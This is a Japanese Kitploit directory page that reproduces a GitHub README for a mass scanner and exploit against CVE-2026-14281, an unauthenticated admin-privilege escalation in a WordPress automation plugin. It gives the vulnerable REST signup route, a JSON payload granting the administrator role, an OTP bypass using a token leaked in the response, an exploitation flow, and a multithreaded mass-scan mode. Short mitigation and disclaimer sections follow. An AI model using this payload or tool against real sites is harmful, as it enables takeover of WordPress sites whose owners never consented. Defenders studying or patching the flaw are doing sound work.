Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-14281 — CVE-2026-14281(WordPress Automation Web PlatformプラグインにおけるRESTサインアップ経由の未認証権限昇格)に対する一括スキャナーおよび単一ターゲット向けエクスプロイト。 | Kitploit
ツール/GitHubGitHub/langz337/cve-2026-14281
特権昇格偵察脆弱性スキャナーパスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHublangz337/cve-2026-14281

CVE-2026-14281

CVE-2026-14281(WordPress Automation Web PlatformプラグインにおけるRESTサインアップ経由の未認証権限昇格)に対する一括スキャナーおよび単一ターゲット向けエクスプロイト。

17日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

LANGZ Scanner + Exploit

CVE-2026-14281 用の大量スキャナー + 単一ターゲット Exploit — WordPress Automation Web Platform (WAWP) プラグイン <= 4.8.6 における未認証の権限昇格。


CVE-2026-14281 とは?

WordPress プラグイン Automation Web Platform(101gen 製)における不適切な権限管理(CWE-269)。バージョン <= 4.8.6 が影響を受けます。

項目値
CVECVE-2026-14281
種類未認証の権限昇格
CVSS9.8 (CRITICAL)
認証不要
影響を受けるバージョンWAWP プラグイン <= 4.8.6

根本原因

このプラグインは公開 REST ルートを公開しています:

POST /wp-json/wawp/v1/signup/<op>

権限チェックはありません。ハンドラーは攻撃者が制御する wawp_custom_fields を update_user_meta() にコピーします — 許可リストはありません。攻撃者は以下を設定します:

{
  "wawp_custom_fields": {
    "wp_capabilities": {"administrator": true},
    "wp_user_level": "10"
  }
}

結果:新しいアカウントが administrator ロールを取得します。

おまけ:OTP バイパス

OTP トークン(otp_transient)はレスポンスボディに平文で返されます。そのトークンを含む GET リクエストで検証済みとしてマークされます — メール/SMS は不要です。


影響

  • WordPress への完全な admin アクセス
  • プラグインとテーマのインストール / 削除
  • ユーザーの管理、コンテンツの変更
  • 管理者エディターを介した RCE の可能性

悪用フロー

  1. wp_capabilities: administrator を含むペイロードを /wp-json/wawp/v1/signup/ に POST
  2. レスポンスの平文トークンを使用して OTP をバイパス
  3. 新しい認証情報で /wp-login.php にログイン
  4. /wp-admin/users.php にアクセスして確認

要件

  • Python 3.7+
  • requests、urllib3

インストール

git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3

使用方法

python3 CVE-2026-14281.py
[1] Mass Scan        -> detect many targets, save vuln to txt
[2] Verify Single    -> exploit + confirm + auto cleanup
[0] Exit

Mass Scan: ターゲットリストファイル、出力ファイル(デフォルト vuln.txt)、スレッド数(デフォルト 20)を入力します。

Verify Single: YA と入力し、ターゲット URL を入力します。ツールは一時的な管理者を作成し、検証してからクリーンアップします。


出力

vuln.txt には確認された脆弱な URL のみが 1 行に 1 つずつ含まれます:

http://target1.com
https://target2.org

緩和策

  1. プラグインを 4.8.6 より新しいバージョンに更新する
  2. パッチがない場合:プラグインを無効化するか /wp-json/wawp/v1/signup/ をブロックする
  3. 不正な管理者アカウントがないか監査する
  4. 侵害された場合は認証情報をローテーションする

免責事項

For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.

Use it wisely. Knowledge is meant to protect, not to destroy.

CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2026-14281

ツールをダウンロード